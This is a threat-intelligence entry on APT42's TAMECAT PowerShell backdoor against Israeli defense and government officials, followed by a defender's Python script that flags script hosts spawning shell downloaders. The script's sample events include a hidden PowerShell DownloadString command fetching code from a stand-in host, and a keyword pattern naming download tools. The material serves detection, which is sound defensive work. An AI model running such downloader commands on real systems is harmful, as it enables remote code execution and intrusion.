Threats Feed | APT42 | Last Updated: 03/02/2026 | Author: Certfa Radar | Publish Date: 29/01/2026

APT42 Deploys Modular TAMECAT Backdoor Targeting Defense and Government Sectors

  • Actor Motivations: Espionage, Exfiltration
  • Attack Vectors: Backdoor, Downloader, Spyware, Pretexting, Spear Phishing
  • Attack Complexity: Medium
  • Threat Risk: High Impact/Low Probability

Threat Overview

APT42 uses TAMECAT, a modular PowerShell-based backdoor, to target high-value senior defense and government officials. Israel's National Digital Agency reports that the group relies on social engineering to gain initial access. The infection chain begins with a VBScript that profiles the installed antivirus software via WMI to decide whether to deploy a PowerShell or Command Shell downloader. TAMECAT offers sophisticated capabilities, including screen capture, Chrome data collection, and abuse of Microsoft Edge remote debugging. It uses legitimate services such as Telegram and Discord for Command and Control (C2). Collected data is encrypted with AES and exfiltrated to domains such as glitch[.]me, demonstrating APT42's focus on stealth and persistent espionage operations.

Detected Targets

Type   | Description                      | Confidence
Sector | Defense                          | Verified
Sector | Government Agencies and Services | Verified
Region | Israel                           | Verified

Extracted IOCs


Tip: 6 related IOCs (0 IP, 0 domain, 0 URL, 0 email, 6 file hash) to this threat have been found.

Overlaps

APT42: Iranian Cyber Espionage Campaign Targets Global NGO and Media Sectors

Source: Google Cloud - May 2024

Detection (two cases): 081419a484bbf99f278ce636d445b9d8, d7bf138d1aa2b70d6204a2f3c3bc72a7

Hint: Overlaps are extracted automatically by examining the IOCs associated with all indexed threats and actors.

FAQs

The TAMECAT Espionage Campaign

The Israel National Digital Agency analyzed a cyber-espionage campaign using a new malicious tool called TAMECAT. This malware is a "backdoor," meaning it allows attackers to secretly control a computer, steal files, and watch what the user is doing.

The attack is attributed to APT42, a state-sponsored cyber-espionage group linked to Iran. They are known for conducting long-term surveillance operations rather than immediate financial theft.

The report indicates the primary targets were high-value senior defense and government officials. The attackers focused on specific individuals who likely possess sensitive national security or strategic information.

The attackers first used "social engineering," engaging in conversation with victims to build a fake friendship or professional relationship. Once trust was established, they convinced the victim to open a file. This file (a script) checked the victim's antivirus software and then downloaded the main malware (TAMECAT) from the internet using standard computer tools to avoid raising alarms.

Once inside, TAMECAT can take screenshots, steal information from web browsers like Chrome and Edge, and execute further commands sent by the attackers. It hides its communication by using popular, legitimate web services like Telegram and Glitch, making the traffic look normal to security systems.

Organizations should block the specific web domains mentioned in the report (such as glitch[.]me subdomains used by the attackers) and monitor for suspicious script activity on their networks. Crucially, high-profile staff should be trained to recognize social engineering attempts, especially from online contacts seeking to send files after a period of chatting.
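As an added defender-side illustration (not part of the Certfa Radar entry or of any cited report), the following Python correlates the two stage-one behaviours the overview describes, a script host that enumerates antivirus products through WMI and then launches a PowerShell or cmd.exe downloader, over constructed process-creation and WMI-activity records. The event field names, the root\SecurityCenter2 namespace and the download-command keyword list are assumptions.

```python
"""Correlate WMI antivirus profiling with a script host spawning a shell
downloader, the first stage of the TAMECAT chain described on this page.
All events below are constructed samples, not real telemetry."""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Assumption: the VBScript reads AV products from the SecurityCenter2 namespace.
AV_QUERY = re.compile(r"AntiVirusProduct", re.IGNORECASE)
# Assumption: typical download primitives a downloader stage would use.
DOWNLOAD_HINTS = re.compile(
    r"\b(Invoke-WebRequest|iwr|DownloadString|DownloadFile|Net\.WebClient"
    r"|curl|bitsadmin|certutil)\b", re.IGNORECASE)

# Constructed events: "proc" = process creation, "wmi" = WMI-Activity query record.
SAMPLE_EVENTS = [
    {"type": "proc", "pid": 100, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"type": "proc", "pid": 200, "ppid": 100, "image": "wscript.exe",
     "cmdline": 'wscript.exe "C:\\Users\\u\\Downloads\\invitation.vbs"'},
    {"type": "wmi", "client_pid": 200, "namespace": "root\\SecurityCenter2",
     "query": "SELECT displayName FROM AntiVirusProduct"},
    {"type": "proc", "pid": 300, "ppid": 200, "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"(New-Object Net.WebClient)"
                ".DownloadString('https://stage.invalid/x')\""},
    # Benign: PowerShell started by explorer, not by a script host.
    {"type": "proc", "pid": 400, "ppid": 100, "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\IT\\backup.ps1"},
    # Script host spawning cmd.exe, but no AV profiling and no download primitive.
    {"type": "proc", "pid": 500, "ppid": 100, "image": "cscript.exe", "cmdline": "cscript.exe logon.vbs"},
    {"type": "proc", "pid": 600, "ppid": 500, "image": "cmd.exe", "cmdline": "cmd.exe /c net use"},
]

def find_tamecat_stage1(events):
    """Return one alert per shell spawned by a script host, ranked by how many
    stage-one traits (WMI AV profiling, downloader command line) it shows."""
    procs = {e["pid"]: e for e in events if e["type"] == "proc"}
    av_profilers = {e["client_pid"] for e in events
                    if e["type"] == "wmi" and AV_QUERY.search(e["query"])}
    alerts = []
    for child in procs.values():
        parent = procs.get(child["ppid"])
        if not parent or parent["image"].lower() not in SCRIPT_HOSTS:
            continue
        if child["image"].lower() not in SHELLS:
            continue
        traits = {"av_profiled_via_wmi": parent["pid"] in av_profilers,
                  "download_command": bool(DOWNLOAD_HINTS.search(child["cmdline"]))}
        severity = ("high", "medium", "low")[2 - sum(traits.values())]
        alerts.append({"script_pid": parent["pid"], "shell_pid": child["pid"],
                       "severity": severity, **traits})
    return alerts
```

Running `find_tamecat_stage1(SAMPLE_EVENTS)` yields a high-severity alert for the wscript.exe chain (pid 200 to 300) and a low-severity one for the cscript.exe chain, while the explorer-launched PowerShell is ignored.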